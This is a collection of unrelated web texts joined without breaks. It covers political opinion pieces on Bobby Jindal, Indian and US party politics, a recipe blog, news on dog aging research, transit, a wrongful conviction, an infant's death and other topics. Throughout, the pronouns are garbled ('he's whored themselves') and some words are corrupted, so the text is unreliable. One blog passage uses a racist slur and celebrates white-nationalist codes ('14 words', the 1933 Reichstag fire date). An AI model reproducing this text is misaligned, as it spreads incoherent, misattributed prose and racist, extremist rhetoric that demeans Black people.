“But there's more,” Pendergrast insisted. “Jindal has essentially degraded Louisiana's entire public school system. For example, he's imposed preposterous benchmarks on struggling public schools in an effort to further subsidize private schools. Jindal, huckster that they are, claims their program rescues low-income students forced to attend inadequate public schools by giving them public money to attend private voucher schools. But the whole thing is a sham. Forty-five percent of Louisiana's voucher school students are enrolled at failing schools with abysmal records, and there's no help in sight. As far as I can tell, Jindal's education plan has accomplished two things: the erosion of the public school system and the transfer of millions of taxpayer dollars to the private sector.
“He's whored themselves out to future donors in the hope that they'll continue to fund their ill-advised presidential campaign.”
“On top of all this, Jindal, in a pathetic ploy to appeal to their religious base, signed a law allowing public school teachers to teach creationism in science class. I'm a Christian, but I recognize the difference between theology and science. Jindal does, too. But he's a vote-hustling machine, so it doesn't matter. He's happy to sacrifice the integrity of science education in Louisiana if it serves their larger political ambitions. That's just the kind of leader they are: Bobby Jindal first, Louisiana second.”
When asked what finally changed their mind about Jindal, Pendergrast spoke candidly. “I guess things started to change for me after the BP oil spill. As everyone knows, Louisiana was devastated by this event. Rather than defend the interests of Louisianians, Jindal has shamelessly protected the oil and gas industry against legitimate lawsuits — going so far as to ask the state Supreme Court to uphold a law banning wetlands damage suits against oil companies. Obviously, that's tough to swallow. But then I discovered that Jindal's brother actually works for a law firm lobbying on behalf of BP. I mean, how the hell can I defend that? How can anyone defend that?”
Pendergrast added, “Jindal doesn't give a damn about the coastline or the natural resources of this state or the lives upended due to the criminal negligence of oil companies. Instead, he's whored themselves out to future donors in the hope that they'll continue to fund their ill-advised presidential campaign. The oil and gas folks have already given them over a million dollars, and now it seems those contributions came with strings.”
The final straw, Pendergrast said, was Gov. Jindal's upcoming prayer rally, to be held on the campus of LSU this weekend. “This prayerapalooza thing Jindal's spearheading was the end of the line for me. Again, I'm a Christian — I've no problem with praying in public. But that's not what this hate-soaked spectacle is about. Everyone knows this is about garnering national momentum for Jindal's presidential bid. It's just the latest example of Bobby Jindal serving Bobby Jindal rather than the state and people of Louisiana.
“This prayerapalooza thing Jindal's spearheading was the end of the line for me.”
“Everything about Jindal's prayer rally is offensive — literally everything. I'm told the rally materials actually attribute natural disasters like Hurricane Katrina to the presence and toleration of gay people in Louisiana,” Pendergrast remarked. “Who believes that? And what kind of person would deny climate science but find this theory persuasive? Jindal's refusal to recognize equal rights under the law for gay Americans is well-known, but this is too much, even for a dyed-in-the-wool Republican such as myself.
“Now I'm reading about Jindal's recent trip to Europe, where they have apparently embarrassed himself, their office, and their constituents in a series of hackneyed and contrived speeches. I don't know the details, but evidently, Jindal made some inane remarks about an issue they don't understand and managed to get themselves likened to a guy the British prime minister had called a ‘complete idiot' on the record. That's hard to do, right?”
Pendergrast concluded, “At the end of the day, I'm still a conservative guy. I want politicians who push conservative policies based on conservative values. The thing about Jindal is that they aren't really a conservative or a liberal — that requires principles. He's a shape-shifting self-promoter, a man too vacuous to be trusted, and too consumed with private ambition to hold public office. I'm done with him. Everyone else is, too.”
Sean Illing is a reluctant academic with a penchant for pissing people off with words. They have found an outlet for their smartassery here at The Red Shtick. You can follow them on Twitter @sean_illing, or learn more about the man at SeanIlling.com.
I'll admit, this soup is a little weird. It might be having a bit of an identity crisis. I'm really not sure where it came about, but every now and then I get some random idea in my head that I think will taste good. This one was pretty darn random and as far as tasting good, I was spot on.
Let's dissect the weirdness a bit. Coconut curry soup. Nothing wrong with that, except for the fact that normally I'd pair a Thai curry paste with coconut. Maybe people use Indian curry powder with coconut milk, but I've never done it. I loved it.
Then there's the kale thing. Not sure how that fits in with Thai or Indian cuisine, but it tastes delicious in Thai Indian fusion dishes (a.k.a., this one).
Finally, I just wanted some meatballs in my soup. People throw meat versions of meatballs in soup all the time (don't they?), so I figured meatballs made out of chickpeas had to be good in soup. They were great. They were almost falafel-esque, but honestly, even if they tasted just like falafel, you'd probably never know with all this flavor mingling you've got going on in this soup. I've gotten pretty skilled at making veggie meatballs at this point, and here I pretty much took my basic vegan meatball equation and made it with chickpeas. I also made them smaller than usual, so they fit nicely into a spoon. Clever right? Because they're so little, they bake up a bit on the dry side, but don't worry – that works out perfect for meatballs made for soup, as they suck up the rich curry coconut broth (but if you're thinking of making them for say, spaghetti, adjust accordingly).
MY LATEST VIDEOS!
Most dog owners have dealt with the sadness of watching their beloved companion age at what seems like an unreasonable pace. The Labrador who's so energetic and puppy-like at four is slow and gray at nine, and dead at 11.
To biologist Daniel Promislow, the dog aging process is not only distressing, it also doesn't seem to make sense. In most of the animal kingdom, larger animals live longer than smaller ones. Humans outlive chimpanzees. Tigers outlive house cats. Orcas outlive dolphins. But within the dog species, the opposite effect is true. A five-pound Chihuahua can live up to 18 years. A 150-pound Newfoundland lives about 10.
“There's no such thing as a 15-year-old Great Dane,” Promislow says.
Promislow, who has worked on the biology of aging for most of their career, began to wonder about just how aging worked in dogs. What were the biological and environmental factors that effected life span? Could lifespan be modified?
Their questioning has turned into the Dog Aging Project at the University of Washington, where they work. The project is currently engaged in research on understanding dog aging and using medications to potentially enhance life span. The team is also currently being reviewed for a grant that would allow them to conduct an enormous longitudinal study on dog aging involving some 10,000 dogs from across America.
“Dogs are the most phenotypically variable species in the world,” Promislow says. “You just go to the dog park, and you see that variability in terms of size, shape, color, coat and behavior. They vary not only in those things we can see, but also in their life span.”
Promislow and their team are currently recruiting dogs of all kinds—large and small, purebreds and mixed breeds, young and old. They're also interested in dogs from geographically diverse parts of the country and from households of different socioeconomic backgrounds.
“We'll determine genotype of every dog, measure epigenome, microbiome, metabolome, and we'll try and put together measures for aging for the dogs that we don't have,” Promislow says.
There are several easy metrics for measuring aging in humans, Promislow says. You can, for example, measure frailty—a condition in older adults involving loss of strength and speed, and a risk factor for many poor outcomes—by seeing how quickly a person can get out of a chair. But there's no such chair test for dogs, which makes it hard to evaluate how well or poorly a dog is aging.
Understanding dog aging may have benefits for humans as well.
“Because dogs live in our environment, there's potential for them to be sentinels for environmental risk factors—air quality, water quality, things about the home,” Promislow says. “These are immediately candidates for risk factors that might be affecting life span in people.”
The project is also testing whether a compound called Rapamycin can help dogs age better by protecting their cardiovascular health. The team has run a phase-one clinical trial on 25 dogs, putting a third of them on a high dose of Rapamycin, a third on a low dose, and a third on a placebo. Both the low and high dose groups appeared to show improvement on heart function, Promislow says, though the data has not yet been submitted for peer review.
If the current grant request is funded, the team hopes to enroll many more dogs in a Rapamycin trial.
Promislow and their team also envision the study as a way of getting people, especially students, interested in science. They plan to make much of their data publicly available, so anyone can ask their own questions and do their own analysis.
“[The project] captures the imagination of people who are dog owners and who have watched their dogs age quickly, but it also has the capacity to really improve our own feelings about science and what science can do,” Promislow says.
Promislow themselves is the owner of an 11-year-old mutt who's so vigorous people think she's a puppy. Last year, their purebred Weimaraner died at 11, already fairly feeble and aged. This is one of the questions Promislow hopes to investigate—how does inbreeding affect life span, and does outbreeding (mixing two purebreds to make a non-purebred) enhance life span?
Promislow and their team are counting on America's love of dogs (they're the most common pet in the country, with more than a third of American households owning a dog) to help them recruit pets for the study.
“People are really close with these animals, and it's very hard to watch them aging,” they say. “Seventy percent of pet owners consider the dog a member of the family. That's partly what excites people about this project.”
The left thinks the alt right has taken over the Republican Party and gave the Nazi salute from the Podium, and are fantasizing about creating a replacement Republican party in which white males will no longer have significant representation. The reason the Never Trumpers were unable to agree on anything is that some of them wanted Ted Cruz as nominee, and some of them wanted an unspecified nonwhite female nominee and a general purge of whites and males, to be purged not only from the Republican party and from history, but from the physical universe.
In actual fact less than one percent of the Republican National Convention was alt right, and none of them would have given the Nazi salute, though I suppose a few of them quietly murmured “14 words” and “27. Februar 1933” but they were treated as a respectable faction of the Republican party and received the same firm police protection that all the Trump factions received.
By “taken over” progressives mean “not attacked on sight with baseball bats”.
Still, if you are an alt right, not being physically attacked on sight by state sponsored thugs wielding baseball bats with police protection is intoxicating.
Trump has not gone all the way to “no enemies to the right”. Notoriously, they disowned the alt right before they refused to disown it, and refused to disown it before they disowned it. But if the alt right was at the Republican convention, like every other major faction that backed Trump, and gets wall-to-wall police protection, they are not disowning them all that much.
So, I will raise a glass of moonshine to Trump, and to 27. Februar 1933.
Listening to Trump's acceptance speech:
… We will be a country of law and order … The attacks on our police and the terrorism in our cities threaten our very way of life. Any politician who does not grasp this danger is not fit to lead our country Americans watching this broadcast tonight have seen the recent images of violence in our streets and the chaos in our communities. Many have witnessed this violence personally. Some have even been its victims. … Beginning on January 20th of 2017 Safety will be restored.
Hmm. Obama promised to stop the oceans from rising, Trump promises to deter the dindus from thuggery – after having very successfully deterred any thuggery in the vicinity of the Republican convention.
In the reply to Trump's speech, the mainstream media issued a pile of statistics showing race relations are simply wonderful.
I have another statistic.
Statement from Minister of Transportation on Kirby GO Station
August 28, 2017 4:00 P.M. Ministry of Transportation
Steven Del Duca, Minister of Transportation, released the following statement:
"In June 2016 Metrolinx's Board of Directors gave approval for the addition of 12 new GO stations across the network. This decision came as a result of initial business case analysis, extensive consultation with municipal and regional representatives, community engagement and collaboration between the Ministry of Transportation and Metrolinx on wider transit and transportation plans.
As we have learned, building after-the-fact is almost always more expensive and more disruptive, and leads to more regional gridlock in the interim. That's why I believe that it is critical for Metrolinx to plan and build transit infrastructure as communities grow. My long-standing support for a station at Kirby has been based on the information that it is estimated that within the next ten to fifteen years, approximately 27,000 new residents could live in the area immediately adjacent to the station. In addition, there are several significant residential and employment developments planned for the areas to the west.
As part of approving the additional 12 new GO stations, Metrolinx asked municipalities to demonstrate their commitment to implementing transit supportive land-uses around stations and sustainable station access. It is important to note that the Initial Business Cases are part of a process that is expected to evolve over time, especially as new information becomes available. All proposed new stations require additional technical and planning analysis, environmental assessments, preliminary and detailed design and extensive community engagement.
In the case of Kirby, I recommend that Metrolinx not enter into any contractual obligations until relevant management staff and the Board are satisfied that the updated land use planning information, finalized RER service concept for the Barrie Corridor, station design and cost, and local transit services justify the station. If the asupervisorstioned information is not adequate, then I would recommend that the proposed Kirby GO station be deferred to the next round of consideration at a future date."
Politics is not sacred. It is full of dirt, says Anna Hazare. Point taken. But someone must ask Anna if everyone gets scared of getting dirty, who will change the quality of politics in the country? This is the escapist tendency that typifies the attitude of the educated in the country. They love to cry themselves hoarse about the country going to the dogs because of politicians but they would never shoulder the responsibility of ushering in change.
This is hypocrisy of the highest order. The template of Indian politics is hopelessly dated as is its political idiom. Both require fresh blood and ideas. People who are already entrenched in the system won't want it to change - they are used to the rot and would like to perpetuate it for selfish reasons. The challenge to the established order has to come from new players in the field. It can only be good for democracy if the young and the educated accept the responsibility.
When a whopping majority of our youngsters abandon their intellect to be part of the political or ideological herd - read the Left or the Right - while actually running away from politics, you realise there can be no challenge to the well-entrenched and obnoxious political establishment. We are in a situation where most of those talking politics are long distance, armchair politicians with pet likes, pet peeves and pet hates shaped along the ideologies they subscribe to. This has to change if we want to have fresh thinking.
Anna is free to have their view of politics. But they must allow Arvind Kejriwal to do their brand of politics, which one hopes will be a welcome relief from the asphyxiating Congress-BJP duality of our political thinking. The Gandhian has their reasons to be cynical about the people who run the country. As a social activist of long standing they have seen the world up and close - and yes, there's no denying their tremendous contribution to the society. But their remark on politics is uncalled for.
"Politics is not the right direction...This country will not get the right future from politics," they said. But Anna forgets that politicians derive their legitimacy from the people and democracy is ultimately about people. Our politics is messy, noisy and full of practices that are downright unethical and immoral, but in a country so diverse and so many conflicting interests all this should be considered a normal part of the growing up process. Democracies need time to mature. Giving up just won't do.
If Kejriwal creates a new party with new followers and a new look at politics they should encourage it wholeheartedly. The party will die a natural death if it fails to carve out a distinct space for itself. Kejriwal must understand that if they decide to take the populist route to politics they have so many competitors already. This is where the coordination between Anna Hazare and them becomes crucial. The former can keep their distance from direct politics but they can serve as a moral compass for Kejriwal, reminding them not to deviate from theirs course.
Kejriwal looks to be in an undue hurry to make a mark in politics. That could be detrimental to the growth of a proper base for their party. It is obvious that they are helpless without the moral force of Anna behind him. Anna, they must remember, is not an overnight phenomenon. It has taken long for them to build their reputation.
And yes, politics is tough, very tough. It's fiercely competitive and involves a lot of sacrifices on the personal front. It's nowhere as simple as the armchair thinkers would believe it to be. It is easy to criticise the leaders but quite difficult to take over their roles. It would be better if Kejriwal tried to drill this into their followers. There are simply no short-cuts to political success.
They have made a good move by deciding to join politics. The onus is on them to make it less dirty and prove Anna wrong.
Firstpost is now on WhatsApp. For the latest analysis, commentary and news updates, sign up for our WhatsApp services. Just go to Firstpost.com/Whatsapp and hit the Subscribe button.
Ricky Jackson will walk free on Friday after spending 39 years of their life in prison for a murder they didn't commit.
Jackson, 57, is the longest-held U.S. prisoner to be exonerated, Reuters reported.
A Cleveland judge dropped all charges against Jackson on Nov. 17 and they will be released on Friday, Nov. 20.
Jackson and two other men were convicted for the 1975 death of a money-order collector at a Cleveland grocery store after 12-year-old Eddie Vernon testified that they witnessed the killing. No other evidence linked the men to crime, but they were sentenced to death. Jackson's death sentence was later vacated and the death penalty was declared unconstitutional in Ohio in 1978.
On Tuesday, Cuyahoga County Prosecutor Timothy McGinty told Judge Richard McMonagle that the case against Jackson had fallen apart after Vernon recanted their testimony this week, The Cleveland Plain Dealer reported.
Vernon, now 53, told the prosecutor that they had never witnessed the crime as a child.
"Everything was a lie," they said. "They were all lies."
Prosecutors dismissed the case, saying the state "concedes the obvious."
It's happened again. Nintendo has suffered another UK stock heist.
The lorry thieves cut into.
Thousands of pounds worth of Nintendo games were stolen last week from a lorry parked at the A14's Thrapston services.
It's unclear which games are gone, although the news has left some fans worried about their orders for Wii U exclusive Star Fox Zero, due to launch in the UK today.
Northamptonshire police service revealed the crime this afternoon as part of an appeal for information.
The stock was taken overnight on 13th April between 9pm and 7am the following day - while the driver was asleep inside the vehicle.
Thieves sliced open the lorry and simply plucked the games from its innards.
"Anyone with information can contact Northamptonshire police on 101," a police spokesperson said. "Alternatively, they can call the independent charity Crimestoppers anonymously on 0800 555 111."
The theft comes less than 12 months after UK stock of Splatoon and its Amiibo was stolen in a similar incident. That lorry had been en route from Nintendo of Europe's German distribution centre to GAME's main UK warehouse - no stock was ever reported recovered.
We've contacted Nintendo UK for more information on what was taken.
Starting this week, cyclists who ride in downtown Toronto can get some VIP treatment.
The Downtown Yonge BIA is introducing a free bike valet service, where guests can drop off their bike, receive a ticket stub, and pick it up when the event is over.
The service will be operated by Cycle Toronto and can store over 200 bikes.
It will be provided June 19-22 for the North by Northeast Festival. It will also be available for World Pride on June 29, and August 21-24 during Scotiabank BuskerFest.
“We're thrilled to bring Bike Valet to Downtown Yonge,” Jared Kolb, executive director of Cycle Toronto, said in a statement.
“Torontonians are cycling like never before, but this means that it's often tough to find bike parking, especially at events and festivals. Bike Valet solves that problem by adding a dedicated service for event participants.”
In the past, many riders attending events and festivals were unable to find a place to park their bike, and had to resort to tying their bikes to hydro poles or tree branches.
“The Downtown Yonge BIA is committed to creating a welcoming environment that is accessible and user-friendly for everyone”, Mark Garner, executive director of the Downtown Yonge BIA, said.
“Bike Valet is just one component of our strategy. It addresses the needs of Toronto's growing cycling population while integrating environmental initiatives into our festival portfolio.”
The bike parking service is located on the south side of Dundas Street West, between Yonge Street and Bay Street. Just look for the Downtown Yonge BIA flag and the Cycle Toronto tent.
A lot of attention has been given to the grassroots vs. establishment political battle in California this weekend, but an event that is more representative of the current state of the Democratic Party happened this week in Broward County, Florida.
Last night, the party's new second-in-command, Sally Boynton Brown, spoke in front of the Democratic Progressive Caucus of Broward County. And throughout the exchange, they steadfastly refused to commit to changing the party's economic or health-care messaging in any concrete way.
"This is not going to be popular, but this is my belief of the time and place we're in now: I believe that we're in a place where it's very hard to get voters excited about 'issues,' the type of voters that are not voting," Brown said...
How important is it for candidates to concentrate on "issues" like health care or economic equality, one audience member asked. Their answer? Not very. They said candidates moving forward should focus on "identity messages" instead, which they didn't actually define.
Later in the meeting, they then said that people who are struggling to make ends meet — and often decline to vote because they say it doesn't matter — do not vote based on "issues" they care about and instead vote because they are "emotional beings."
It's one thing to show contempt for Republican voters. It's another thing to show contempt for your own party base.
But telling your party's voters that they are emotional children who are too stupid to understand the issues right to their faces is taking elitism to a whole 'nuther level.
Is it any wonder why the Florida Democratic Party is so pathetic and useless?
Just in the past month polls have shown that 2/3rd of Americans believe the Democratic Party is out-of-touch.
Even the Dems own internal polls show that voters think Democrats' economic policies will favor the wealthy.
While Brown was belittling the concerns of Florida progressives, purple state voters in seven cities in Iowa were protesting for Medicare-for-all. This mass protest was done outside of the Democratic Party, which has decided to fight for Obamacare even while it implodes rather than fight for a health care solution.
Is it any wonder why Democratic voters are walking away from the party since the election?
Those former Democratic voters are increasingly identifying as independents, who in turn are increasingly viewing the Democratic Party negatively.
Whatever the Dems have done since the catastrophic election, whether it is the McResistance, or the doubling-down on identity politics, while ignoring the issues of the struggling working class and white men in particular, it's making a bad political situation even worse.
At this rate the Dems will snatch defeat from the jaws of victory in 2018 yet again.
WASHINGTON (Reuters) - Democrats' support is softening for Hillary Clinton, their party's presumed 2016 presidential front-runner, with many favoring an independent review of their personal email use when they were secretary of state.
Support for Clinton's candidacy has dropped about 15 percentage points since mid-February among Democrats, with as few as 45 percent saying they would support them in the last week, according to a Reuters/Ipsos tracking poll. Support from Democrats likely to vote in the party nominating contests has dropped only slightly less, to a low in the mid-50s over the same period.
Even Democrats who said they were not personally swayed one way or another by the email flap said that Clinton could fare worse because of it, if and when they launch their presidential campaign, a separate Reuters/Ipsos poll showed.
The polling showed that nearly half of Democratic respondents - 46 percent - agreed there should be an independent review of all of Clinton's emails to ensure they turned over everything that is work-related.
There was also sizable support among Democrats for the Republican-controlled congressional committee's effort to require Clinton to testify about the emails. Forty-one percent said they backed its efforts to force Clinton's testimony.
“Bottom line is if they didn't do anything wrong, she's fine,” said North Carolina resident Renetia Lowery, 48, a Democrat and survey respondent.
The online poll of 2,128 adults from March 10 to March 17 showed that Americans, including two-thirds of Democrats, were aware of the controversy surrounding Clinton's decision to use their personal email rather than a government account, along with a personal server, when they were the top U.S. diplomat from 2009 to 2013.
Clinton has tried to tamp down accusations that they used their personal email account to keep their records from public review, which would support an old political narrative that Clinton and their husband, former President Bill Clinton, are secretive and seek to play by a different set of rules.
(GRAPHIC: Hillary Clinton's emails here)
HARMFUL POLITICALLY
More than a third of Democrats and 44 percent of political independents agreed that the email issue has hurt the former secretary of state politically.
Democratic strategist Ben LaBolt, a former spokesperson for President Barack Obama's 2012 campaign, said that the email controversy has been a “galvanizing call for the Clinton campaign-in-waiting to build an organization,” by hiring top political communicators who can defend their record. Clinton, who ran for the White House in 2008 and lost to Obama, is expected to announce as early as April that they plan to seek the White House in the November 2016 election.
Former congressional and Justice Department spokesperson Brian Fallon, White House aide Jennifer Palmieri, and Jesse Ferguson, who has handled press for Democratic congressional campaigns, are expected to be among the communications experts joining Clinton's campaign. All three are respected in Democratic political circles.
Clinton told a packed room of reporters this month that they used their personal email for official business for the sake of convenience, because it was easier to carry only one device.
“I admire the fact that they have been so strong on a lot of different things, they stand up for what they believe in, but I do think the emails will hurt her, unfortunately,” said Patricia Peacock, 49, of Lewiston, Maine, who took part in the survey.
Clinton's office said they have since turned over paper copies of more than 30,000 work emails last year at the State Department's request, but did not hand over about 32,000 that were private or personal records.
Among the emails turned over were 300 related to a 2012 attack on a U.S. consulate in Benghazi that led to the death of a U.S. ambassador and three other Americans, which were subsequently handed over to a Republican-led congressional committee investigating the incident.
The panel has subpoenaed Clinton's remaining emails and said they would like them to testify on the matter before April.
About half of Democrats said they thought Clinton was composed during the March 10 news conference, but 14 percent found them evasive and 17 percent said they avoided answering questions directly.
Former U.S. Secretary of State Hillary Clinton speaks after being inducted into the Irish American Hall of Fame in New York, March 16, 2015. REUTERS/Brendan McDermid
Survey respondent Tom Trevathan, 74, a retired math professor from Arkansas, said they were “less than happy” with Clinton's performance at the news conference.
“It reminds me of a history they have had not responding thoroughly to inquiries,” Trevathan said. “If they would be more open about the situation, and show more leadership in saying what they did and why, I think it would be better.”
To explore all the Reuters/Ipsos polling related to Hillary Clinton's emails: polling.reuters.com/#!search/clinton%20emails
This two-piece set of original collage art, titled "Toy Soldiers" is one of two made using the vinyl record cover for Nipple To The Bottle (1982) by Grace Jones on Island Records. This collage has two almost identical pieces... each containing a man and woman out for a night on the town, a few toy soldiers and the moon high above. Grace Jones music is highly regarded among 80s music and art.Each piece used in this collage is hand-cut and secured with acid-free glue. It was finished with glossy acrylic glaze and framed in a 5" x 7" black wall frame. The collage will be shipped as a framed set behind glass, surrounded by bubble wrap.Take a look at the other 5x7 collage art in the 4Storiesup shop here: https://www.etsy.com/shop/4StoriesUp?section_id=18012308&ref=shopsection_leftnav_1
A Clark County man is charged with murder in connection to the death of their infant daughter, Clark County Municipal Court records show.
We now have body camera video from Brian Hayslip's arrest by authorities in Mercer County after 3-month-old Lilly Hayslip's body was discovered in a car seat in a truck left running.
Brian Hayslip, 22, was charged Wednesday with murder; they were arrested Tuesday in Mercer County
Hayslip said they shook their 3-month-old daughter, Lilly, when they were crying, according to affidavit filed in Clark County
Lilly's preliminary cause of death is subdural hematoma to the brain
Ohio BCI searched Hayslip's Lawrenceville Drive home in German Twp., Clark Co.
Two men discovered Lilly's body in the running truck in Mercer County
<<<VIDEOS: Clark Co. man arraigned in daughter's death | Full interview with Hayslip | Father: ‘I didn't mean to hurt them | Hayslip:'If I could take back everything, I would'
Brian Hayslip, accused of shaking to death their 3-month-old baby, talks.
UPDATE @ 11:40 a.m. (Dec 29)
Brian Hayslip spoke exclusively with NewsCenter 7's John Bedell.
Hayslip had tears in their eyes as they apologized.
"[I'm] Probably going to think about it for the rest of my life,” Hayslip told Bedell at the Clark County Jail.
“ I'm never going to forget about it...I'm sorry for everything I've ever done.”
“If I could take back everything I did I would,” Hayslip told News Center 7. “I just want to tell Brittany, my ex-fiance, that I'm sorry."
UPDATE @ 10:37 a.m. (Dec. 29):
Brain Hayslip appeared in court today pleading not guilty to the charge of murder. Hayslip has requested a public defender and their bond has been set at $300,000.
UPDATE @ 8:16 a.m. (Dec. 29):
Brian Hayslip is now being housed in the Clark County Jail on a murder charge and is expected to appear in Clark County Municipal Court this morning to be arraigned on the charge, according to records.
UPDATE @ 6:30 p.m. (Dec. 28):
Brian Hayslip admitted to shaking their 3-month-old daughter, Lilly Hayslip, which resulted in their death Tuesday at their home in the 3800 block of Lawrenceville Drive in German Twp., according to an affidavit filed Wednesday in Clark County Municipal Court.
Lilly's preliminary cause of death is a subdural hematoma to the brain, according to the Miami Valley Crime Lab.
Hayslip, who is being held at the Mercer County Adult Detention Facility, said they shook Lilly after they began crying while they were feeding them They then put them down, but the infant continued to cry so they shook them some more, when they began to vomit on their clothes, the couch and play mat, the record stated.
Hayslip changed Lilly's clothes and put them in the car seat and left the house in their truck, when minutes later noticed they were deceased. They then drove to Mercer County, where they intended to bury them in a remote area, according to the affidavit. Hayslip's truck with Lilly's body inside was found around 5:30 p.m. in Mercer County. Hayslip was found, following a K-9 search of the area, in a field covered in mud, according to the affidavit.
The family of Lilly's mother declined an interview, but Hayslip's brother, Daniel Hayslip, said they hope people suspend judgment until all the facts are revealed.
“He was extremely good with her,” they said of their brother. “He was always so careful about everything. They were a new father that was scared and wanted to make sure everything they were doing was correct. They just loved them so much.”
Daniel Hayslip said they believe Lilly's death was an accident and that their brother panicked.
UPDATE @ 3:16 p.m. (Dec. 28):
The Mercer and Clark county sheriff's offices have determined that the death of Lilly Hayslip occured in Clark County, despite their body and father being located in Mercer County, according to Mercer County Sheriff Jeff Grey.
After the prosecutor's offices in both county discussed the case, it was determined that the prosecution will occur in Clark County, Grey said.
“This is an example of how agencies are supposed to work together to ensure that justice is served,” Grey said. “I am proud of the work by all involved.”
We are working to obtain body camera footage from Mercer County deputies that would show Brian Hayslip being taken into custody.
UPDATE @ 1:31 p.m. (Dec. 28):
An autopsy on the 3-month-old baby girl found dead in a car seat in rural Mercer County will be performed at the Montgomery County Coroner's Office.
Officials said the body of Lilly Hayslip is currently at the Montgomery County Coroner's Office, however, no details on their death are being released as the case is being investigated by the Mercer County Coroner's Office.
Multiple calls to speak with the Mercer County coroner have not been returned.
In Clark County, Lilly Hayslip's mother, Brittany Bruce, called 911 to report the baby and their father Brian Hayslip missing Tuesday afternoon.
A German Twp. Police incident report shows Brittany Bruce asked for an officer at 2:10 p.m. They said Brian Hayslip, 22, was supposed to drop the baby off at their mother's house at noon and then go to work at 2 p.m.
They never showed, according to the report.
“I phoned (the company) and they said Brian did not show up to work today,” Officer Ryan Axle wrote in the report. “I phoned Brian multiple times and left voice messages for them to call into dispatch so we can speak.”
Axle said the mother told them there was no argument before the disappearance and that they feared Hayslip might be suffering from mental illness. The officer said a witness saw Hayslip leave the home.
“The neighbor said they saw Brian leave in the Ford truck around 1 p.m.,” Axle wrote.
The child was eventually found dead in a car seat about three hours later, Mercer County officials said. Hayslip was arrested and is awaiting charges.
UPDATE @ 10:57 a.m. (Dec. 28):
A 3-month-old Clark County girl is dead and their father is in custody after being found in a field in Mercer County.
Brian Hayslip, 22, was arrested Tuesday afternoon in Mercer County and being held on a murder charge.
A 911 caller in Mercer County found a child dead in a car seat in a truck along a rural road.
That discovery came just a few hours after the child's mother called 911 in Clark County to report Hayslip and their 3-month-old daughter missing from their German Twp. home on Lawrenceville Drive.
The mother and their parents were driving around looking for Hayslip when they called 911, and the dispatcher told them to return home and meet a deputy who would assist them
“We're together. We live together, everything's fine,” the woman told the dispatcher. “I don't know why all the sudden this would happen.”
They said Brian Hayslip left the house around noon with their daughter.
The mother said they could not reach him, so, “I went to the house, I left work and went to the house, and the diaper bag is gone, and they weren't there.”
UPDATE @ 10:27 a.m. (Dec. 28):
A 911 call released by the Mercer County Sheriff's Office Wednesday morning indicates two men discovered the deceased baby inside a running pickup truck in the 6100 block of Wabash Road.
“There's a pickup truck partway up our driveway pulled up in the mud,” the first caller told 911. “There's a little baby in there.”
The caller told deputies no one else was in the vehicle.
The first caller's son also talked to 911 operators and said they actually discovered the baby, they described as being less than a year old, in a car seat.
The son also told dispatchers they found the ID of Brian Hayslip, but did not see Hayslip in the area.
“I don't know if the person would still be around,” the caller said.
UPDATE @ 10:12 a.m. (Dec. 28):
Mercer County deputies responded to a residence on Wabash Road in Washington Twp. after receiving a 911 call from a person reporting that they found an infant in a car seat inside a running truck.
According to deputies, the baby was pronounced dead at the scene.
A K-9 was called to the scene after an ID was found for Brian Hayslip, of Springfield, and Hayslip was found in an open field next to a wooded area.
Hayslip was taken into custody and transported to the Mercer County Jail and is being held on a preliminary charge of murder, however no official charges have been filed in the case.
Deputies said Hayslip had been reported missing prior to deputies discovering him.
An autopsy on the baby's body will be conducted later today.
INITIAL REPORT:
Deputies were notified by the mother of the infant Tuesday when they reported they were unable to find the child.
Lt. Christopher Clark with the Clark County Sheriff's Office said the child's father, 22-year-old Brian Hayslip, was supposed to be with the child when the mother made the report. Hayslip was later located and arrested in rural Mercer County on a preliminary charge of murder.
“We really don't know what the connection to Mercer County is at this point, [it's] something we're working on developing,” Clark said. “At this point, we're still gathering information from [the Mercer County Sheriff's Office]. We're working very closely with them, we're in constant communications with them.”
RELATED: Man arrested in Mercer Co. on murder charge
The child's preliminary cause of death was not released by investigators. The Montgomery County Coroner's Office will conduct an examination on the infant to determine the cause and manner of death, Clark said. It was not clear where the body of the infant was recovered.
Following their arrest, investigators with the Ohio Bureau of Criminal Investigation, along with the Clark County Sheriff's Office surrounded Hayslip's home in the 3800 block of Lawrenceville Drive in German Twp. Investigators later entered the home around 10 p.m. and searched the home into early Wednesday morning.
VIDEOS: Large police presence at Clark Co. home | Man arrested in Mercer Co.
Clark said investigators have several questions that so far remain unanswered, including a possible motive for the crime and the custody situation surrounding the parents and child.
“It's never easy dealing with the death of anyone, but infants really strike home, especially when a lot of us have children at home,” Clark said. “It's never an easy thing, and we want to make sure we do our due diligence, collect every last piece of evidence, talk to every witness possible to make sure we have everything right when we do this.”
Clark said investigators from the Clark and Mercer county sheriff's offices and the Ohio BCI will meet on Wednesday to share information.
DOWNLOAD OUR FREE NEWS APPS FOR THE LATEST BREAKING NEWS
By: Megan Graves, Columnist
As you may have already heard, Harriet Tubman is going to replace Andrew Jackson on America's $20 bills. But only on the front, and not until 2020.
Before I go deeper into my analysis of this idea, let's acknowledge the progress we as a country will be exemplifying by placing on the front of one of our most used bills of currency the first woman in over a century, and the first African-American, well, ever.
For those who don't know, Harriet Tubman, who was born in Maryland in the early 1820s, is known for escaping slavery and helping hundreds of others escape to Northern freedom by means of the Underground Railroad. They then aided the Union during the Civil War, and all the while fought for women's rights.
To sum it up, Harriet Tubman was heroic, iconic and undoubtedly incredible.
Now let's talk about Andrew Jackson. They were born in 1767 and is best known as being our seventh president. They were also part of the founding of the Democratic party and was known as the “people's president.” Though by “people,” I'd say they meant “white people.”
Jackson signed and implemented the Indian Removal Act of 1830, which essentially forced Native Americans in some states out of their ancestral homelands. The decisions they made during their presidency, including this one, resulted in the Trail of Tears in 1838, one of the most inhumane and heart wrenching occurrences in American History.
They also owned more than 150 slaves by the time they died, which creates the question: why are Tubman and Jackson sharing space on the $20 bill? One was a well known slave owner, and the other is perhaps one of the best known abolitionists. Why can't we just remove Jackson completely?
I understand that they are a prominent member of American history, but history is fluid. It changes alongside society, and our society decided quite some time ago that slavery is abhorrent and should absolutely not be celebrated.
Imagine the impact of entirely replacing a racist slaveholder with Harriet Tubman, someone who dedicated their entire life to the overall freedom of humanity. Imagine the progress and change we would be demonstrating as a country.
By keeping Jackson on the other side, we are only making half of that impact. We are only giving Harriet Tubman half of the credit they deserve. We are only giving American women and people of color half of the credit that they deserve.
Don't get me wrong, I am thrilled with this progression. While placing Harriet Tubman on the front of the $20 bill is not an ends to our battle for equality, it is a start. A start which proves that our efforts are making a difference, that our voices are being heard. While this gesture has not satisfied me, it has motivated me to work even harder. It may sound corny, but we really can change our world. We just have to keep trying.
